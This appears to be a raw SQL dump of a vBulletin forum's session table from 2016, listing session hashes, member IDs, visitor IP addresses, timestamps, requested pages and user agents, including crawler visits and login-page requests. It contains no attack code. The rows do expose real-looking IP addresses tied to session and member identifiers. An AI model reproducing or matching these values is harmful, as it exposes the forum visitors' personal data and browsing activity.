('f0c6bce36ff1681cc2db62be08bf8a6a', 0, '2a02:c7f:b406:f', 'a44c3ae0b2313069fdd4a479736c868b', 1465777561, '/showthread.php?t=2463', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b515c265954e38463fe8b115fd2c8362', 0, '2601:601:c700:a', '585889dee42e9ebf8d4c422708c38de8', 1465787080, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2765.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('26b26d2a081fff8a830898ba7a270bff', 0, '31.204.150.118', '829bfc8271b755b52fcb09a6dd87db75', 1465781472, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125 Safari/5', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f32e76590d00857c21dbc3a01215ee13', 0, '194.150.168.79', '57591287adc27cfc54b9bc6b86d72cfd', 1465782107, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('98dd98777dee5bac8fdf44e52581d0a5', 0, '88.162.157.8', '9ff04709edb3eb533fe834d10a1e4747', 1465782145, '/member.php?u=13', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:43.0) Gecko/20100101 Firefox/43.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('798f3713d8a5c1662684e49070db06cf', 0, '66.249.81.157', 'f1755d659957d1db8a9f41907ba23b70', 1465782170, '/member.php?u=100', 'Mozilla/5.0 (X11; OpenBSD amd64; rv:43.0) Gecko/20100101 Firefox/43.0,gzip(gfe)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('daa4fccd319f8539d47028e18632cc8a', 0, '66.249.66.132', '12f36206c9448b3daf21459226f35f3f', 1472247648, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('5eb00b53bb525003eb829b0dbcd5be99', 0, '66.249.66.136', '12f36206c9448b3daf21459226f35f3f', 1471193543, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b6b4a1c31d27655f944a564bf0d14bdc', 0, '66.249.66.179', '12f36206c9448b3daf21459226f35f3f', 1472241899, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('335b50605ca9ee3f894e61af616bca66', 0, '66.249.66.173', '12f36206c9448b3daf21459226f35f3f', 1469827514, '/archive/index.php/t-1856.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('236dfeb4281385aa4e4e63ac11a71399', 0, '66.249.66.140', '12f36206c9448b3daf21459226f35f3f', 1472249108, '/index.php?langid=2', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bbb8643c8fec95bbd099213ad7280e1a', 0, '192.180.71.161', 'cdd3992ae77dce1bd8922d65104df41f', 1465791951, '/forumdisplay.php?f=37', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('a6cdc1b7c9d5947e99e509b49a24ba27', 0, '37.220.21.90', 'da6a57d56b860f4df4022f9cf34ad215', 1465793406, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e178f0ecad1b42b9116b83a9c3cfa6b0', 0, '99.251.78.51', '8e010d039c24c1c52915d76dcbf82ceb', 1465795112, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e31d4fa4f7beebbdaaa1d5df3cf512aa', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465795561, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('c1cd800ec09a4c4c81fb3ef04db48863', 0, '121.219.252.227', 'abdd41a7435d2078f2e76db4c04c0c24', 1465798354, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('cf6f423015173e917e3de3511fdb7a0b', 161, '54.233.145.152', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465801481, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('eff70b6ee928945861dc6bd160b8d7f6', 161, '172.68.29.181', '69ded3bf64c4ca2f3b17ba59eb1334d0', 1465805132, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('b3a1bd628de822197fae254185453df4', 0, '172.68.10.249', '60070cb29fe8c550d96116980ed666c8', 1466249186, '/showthread.php?p=3005', 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b4b4611657cf1ab01ddf7872e9e63bcb', 0, '194.3.84.252', 'ad74cb9d2222d7f3b383e16551cd5fb5', 1465809833, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7c5da632a36fcf64b6a5406c9e0a76af', 0, '66.249.66.132', 'b4343dffbdc847519606d6eb72cdaefd', 1468740389, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('646935d48332d0ef22e9179d16f08fad', 178, '104.46.61.171', '734e0789fc9c3e16941f616de4563485', 1465811184, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('1bb7905f555892c45364426d6afc7f8c', 0, '2a02:598:2::110', '4e2b32a1c2a2f49a09d004a2a207cc61', 1467409643, '/register.php', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('617678f5bd59a60f051e0a8e56e0a948', 0, '91.202.71.251', 'f4eee122507c1a00a39059ecee163313', 1465812383, '/showthread.php?t=2479', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('31c0b3f90c40999e305c94df530b2222', 0, '58.187.209.152', 'e36de3fcedb3e216a2687fe157772981', 1465818793, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9041073103a3c6b9d40bbe8aec1815c4', 0, '2a02:598:a::79:', 'cca1f662a6fffe860912851d031e4a56', 1473708383, '/login.php?do=lostpw', 'Mozilla/5.0 (compatible; SeznamBot/3.2; +http://napoveda.seznam.cz/en/seznambot-intro/)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6d4abde62f681c1baec0f53e0d7b6e14', 100, '172.68.11.240', 'bb6d322c6b416c51f985b77175ac5732', 1465822191, '/index.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 2, 0, 0, 0, 0, 0, 0),
('b7b269e067369fec904140c040c37c3e', 0, '31.24.221.3', '51b69ca685d26744824f467334c54ef0', 1465988350, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c36579231c775e864cfabc9ebdc0817a', 0, '209.249.180.198', '7b6e56911a63271d4c9bc3692310722d', 1465824551, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('99bf546ecc6ea3265fc31007ae6ceff9', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465824648, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('0cb924d4bda69347a0098490e72a7de7', 0, '24.37.95.162', '53b51d45737f7165a4bebb9b6de9b68c', 1465825261, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6bca4abd06f11533fa5f0e4e45612a18', 0, '99.226.96.195', '40644987dc99cdbc9872cae7e6ab521b', 1465825271, '/showthread.php?p=3045', 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.125', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d9e2d371739a8ba91d232c9e748c0014', 0, '2601:342:101:66', 'f0df71a0e4bcf41df194ade893d02745', 1465826037, '/forumdisplay.php?f=37', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b66b536575c9865b05e9b37f6aa2018a', 0, '212.179.28.34', 'f86a0b1bc4131dad38d3687d58a9428f', 1465827446, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('10a21173d58eecbc585b7f1041e234aa', 0, '209.160.73.168', '62184bf9a33d16e37d11b8de7ef51ea7', 1465829747, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('fbfb8f1bd26aecedba5b0396c690f870', 0, '52.12.120.212', 'cc3c08fae4774942a43bfbd89f97a683', 1465832777, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ea88789064fc0ed0a4c91a617a8218a0', 0, '52.12.24.245', '663e02584010ba45e8851c33579d5cf5', 1465832789, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3a6b7d9825f366347ef611ba372470c1', 0, '54.70.34.127', 'c7b6c46e2eb67b3225f480f81320a4e7', 1465832805, '/faq.php?', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('190105f9f248d9e958f0f59fddb3b210', 0, '54.190.157.163', 'c94da9ecb839a1d24798d11e7f80bf69', 1465832816, '/search.php?', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e5e5e6ba58b0507e63065def7ff2c652', 0, '54.214.199.128', '114cd9204f2ac06a28e6c9dd052c98ad', 1465832836, '/register.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2c33e65d7110a5f1b8dc4891999652ed', 0, '54.184.231.73', '98225d9bfdf10875eb1174f4a607eeac', 1465832854, '/tags.php?', 'Opera/12.0(Windows NT 5.1;U;en)Presto/22.9.168 Version/12.00', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1c513ba9bf2677eb6aa93377d8dd59ac', 0, '54.188.137.121', '81fe7fc281f088f2338eb1a2ee100c8f', 1465832866, '/index.php?', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3aac95ee76c900deab8e86d9cb1bfb5a', 0, '54.188.130.92', 'de900b9eab5b6cbae270e069daac080d', 1465832896, '/search.php?do=getnew', 'Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12 Version/12.16', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d2c475bc0bf71228d1f3372adfda4d50', 0, '54.188.238.169', 'cc193541cc932db44da39fb09ff3febd', 1465832925, '/search.php?do=getdaily', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 S', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('686438473a0f6e21e7860be7bc6d2d17', 281, '194.150.168.95', 'efbe4e7ec5f192bfd1e1f0a578f8873b', 1465834925, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('c3d45e429a005753646ac6f8fd50112b', 0, '77.120.158.132', '7b69c82a6c2e78f5ea2c7fb0ff3d7ea4', 1465841389, '/showthread.php?t=1145', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2766.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d47abd803f62702f181667cd47e2a33', 0, '172.68.10.238', '36a514094c207d3d4092e922c4423c55', 1465842066, '/showthread.php?p=3045', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Trident/6.0; Touch; MALNJS)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c9467d4f9d015a8ba661b82c1bd52568', 0, '172.68.11.246', '489119236e7d697d87609a161397429d', 1465842068, '/index.php', 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('340c2c5652363ebe19a98c82cb30b35d', 0, '172.68.11.245', '8b2fea48444036e59843cda1d294288e', 1465951763, '/faq.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f0e502186f3fdf717211ee08e1442f67', 0, '148.251.255.92', 'e7e3465fdd485d385432d89835d1e56d', 1465842263, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('3c351957b5affe89e340a0118db70964', 0, '149.202.58.147', 'c84b994f89cf3f8bbcd37b84e843a346', 1466970046, '/index.php', 'Mozilla/5.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('996a6605bfca677cb93b45928f776aab', 0, '5.196.66.162', 'e9bf3bcf265bdbce2cd88e882d3e212a', 1465842543, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('1639f0c2fda49ccc7e6c0ba5a2b1648a', 0, '2601:647:4b01:f', '49dd980201b795590a37639c34af5415', 1465844048, '/memberlist.php?', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.24', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('7e51ce47950e38cd142f88518068c708', 0, '107.178.35.25', '7654531da4da48d830a0bb7cfb98d24f', 1465847530, '/index.php', 'Mozilla/5.0 (X11; U; Linux x86_64; es-es) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36 Puffi', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6a8eedb07e34fe6a9263d1ff6dbee843', 0, '2a00:1370:8131:', '54ad03e64340086d2e23afb86261fa7d', 1465852397, '/register.php', 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Versi', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ef050ee81497bf40f33e9c43fcda93c2', 0, '81.171.58.121', '49069d287fc2dee7218c625416fab3b9', 1465852410, '/memberlist.php', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('44fd22628a03ba49d8cf9b93e191f35b', 0, '66.249.75.232', '8c2a58ed4130be298d50116da95b8cf5', 1465873670, '/showthread.php?p=2838', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('35fed5d4f8d6db800b836b1be9d60d6f', 0, '5.153.234.98', '34b638fcfc0b2a4a14db198352bbee5d', 1465852919, '/register.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0c1b0a174deadd5fb89c55800108e74b', 0, '172.68.11.247', '30dd0befc105d9ac3e285bb746d68e68', 1465853171, '/showthread.php?t=1030', 'Mozilla/5.0 (Linux; Android 5.1.1; Mi-4c Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('d3caf6407855023c81a572c61d008c0a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465854579, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('01558cb2e9d1c3f4c14d5164fdac5fb4', 0, '78.106.4.151', '5d5e9e47e8cf4805ffc2e2ff0f5762e8', 1465855283, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f4529e7836dcd7501bbc04a619332d31', 0, '198.55.115.24', 'fff150d4333220b22d056291b963d966', 1465856216, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8b14dadbd644d96032d4c3f097fda240', 0, '201.222.150.104', '4c614572dff4638812f61ab85b2570b6', 1465856361, '/index.php', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0d29ca95ce60e724d78cb61d379c4f22', 0, '217.44.91.153', 'ba65c793ac98a0ba9db062b2f9fb6702', 1465857851, '/showthread.php?p=3046', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9c94823dcaefc4d22d97d386cb29a046', 0, '5.35.145.56', 'baba55b67625033e916ca9be669797d6', 1465859560, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ed7ed2b8562a6f857162113a4adf0ce7', 0, '185.84.181.97', 'e9336cceed686ce6fd04b06e3e76a033', 1465860007, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('e324a006378f24df5c55b65ad50b427b', 0, '41.218.209.124', '2e7baeffbd4fec8d81de1875583563d2', 1465860722, '/index.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safa', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('b5d13870963d4b4c6bc783a6c00a830d', 0, '24.101.54.68', '32be9f645c480932dce3efcf36ef9deb', 1465864650, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd8c7091534cc8aa19e2e86c632a5805', 0, '31.185.4.39', 'd2de3173bb523c1a00783d475c13415f', 1465868868, '/showthread.php?t=2346', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('37cf51a6980427eb7736d80845f0cc9e', 0, '128.69.34.94', 'f02196658b6005265718aaadd88349fb', 1465872156, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bde7127240e7ff8a08a591491eb78c16', 0, '129.208.170.67', '7bd2bb9068d62370c11afabbb0b7e9c5', 1465874616, '/index.php?', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/53', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('6ad7ecf8075ff15cfdee83f211609d01', 0, '193.124.59.164', 'da5d67c2be58b2893d568528cceeb09b', 1465876570, '/memberlist.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('41c26e4190b5582fb67ce2c457e18a05', 0, '192.40.93.101', '7f99d1bfac8b20cbe09a6ee462ba9fef', 1465877163, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('0c45ca0869bd14352b4738dbaeaf624e', 0, '2605:e000:141b:', 'e0bdb59398e8a44a6c9d8f4e473ea037', 1469377755, '/register.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('2df9a8f5655093df16b6c45cca251584', 0, '186.14.253.245', '6ee7d6075ec950a6c90d1c7124c96b09', 1465881147, '/index.php/favico.ico', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('95205773b8e642f86cdf575b5370206a', 133, '67.230.176.12', '6e9dca07b2c2f4e35c2c80298e236a58', 1465885214, '/search.php?do=getdaily&days=7', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0', 0, 0, 1, 0, 0, 0, 2, 0, 0),
('379145e3998737d20c6aa9ab113f7550', 0, '195.168.208.50', '93e177247f65a6bb8df6909b6e97d135', 1465887094, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f728a60d7308299fbe9c10705191212e', 0, '66.249.66.140', 'b4343dffbdc847519606d6eb72cdaefd', 1466710825, '/index.php', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('784af1759793239b3f2441e2d9801fb6', 0, '42.112.159.14', '6976681ef72e7d1fd47a89be31d0a0f7', 1465888843, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('c5e08a2e55b00547a7219ae5673f9b47', 0, '2607:f358:21:81', '89a1d898df28b67133c390a885ce4991', 1465890739, '/search.php?do=getnew', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('f3e3281fac1d9824b19afa02a3f46cdf', 0, '5.135.145.104', 'e0b6eebcf000eec6b40e38a454a5af6e', 1465892232, '/index.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:46.0) Gecko/20100101 Firefox/46.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('deee472c61394ba54825d6d711e6c49d', 0, '37.254.66.27', 'e94356c063de4efed44e04f9f11050a5', 1465894659, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('df6ef08529e0fe078765212a219f8499', 0, '172.68.34.48', 'dce73380cf0fd3aff82da93d9252bb04', 1468828683, '/archive/index.php/t-2462.html', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chr', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('e9de6631896771e021568f0b943227f6', 0, '1.0.183.200', '35e8675c285c8d6f5b7fe0b8c8b1e5dc', 1465896587, '/login.php?do=login&do=login', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('ca3ed288ba187ef8d101816c500b55da', 171, '217.22.171.217', '20643d85bfdce6b79066bc7c5f25b2c5', 1465897212, '/index.php', 'Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0', 0, 0, 2, 0, 0, 0, 2, 0, 0),
('0cb6d54818e949ba26c1123e898f8111', 0, '31.24.221.3', 'edd8bb19c51bff0c17fbe69ecc65bb2e', 1465898868, '/index.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.3', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('760aacd42f096f2a46944d6c5b241e72', 0, '172.68.34.83', 'a938925ca9403f145c82d10ebc1ecbe1', 1470308933, '/archive/index.php/t-2477.html', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 1, 0),
('97f08f939cfc340fb73fb6cd0cffd795', 0, '172.68.34.47', 'a938925ca9403f145c82d10ebc1ecbe1', 1470267425, '/showthread.php?t=2236', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('648b9e2c1ad1119e8c3498d497661958', 0, '172.68.34.46', 'a938925ca9403f145c82d10ebc1ecbe1', 1470304361, '/search.php?searchthreadid=2479', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('9a2454719f94516dd91a05768ed81654', 0, '172.68.34.80', 'a938925ca9403f145c82d10ebc1ecbe1', 1470291406, '/converse.php?u=6&u2=277', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('133161e396de560db93b26c993a8a0eb', 0, '172.68.34.49', 'a938925ca9403f145c82d10ebc1ecbe1', 1470308934, '/index.php', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('bd4ba78605143798da8ebb24d6f785e3', 0, '202.151.30.7', '7fb728afc77743de941e90d1489a04c0', 1465902444, '/register.php', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.33', 0, 0, 0, 0, 0, 0, 2, 0, 0),
('8bba533e6bef019c13c5edb619667543', 0, '172.68.10.202', 'af14de07d2798dcdcef49a088e7e3785', 1465902517, '/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safar', 0, 0, 0, 0, 0, 0, 2, 0, 0),
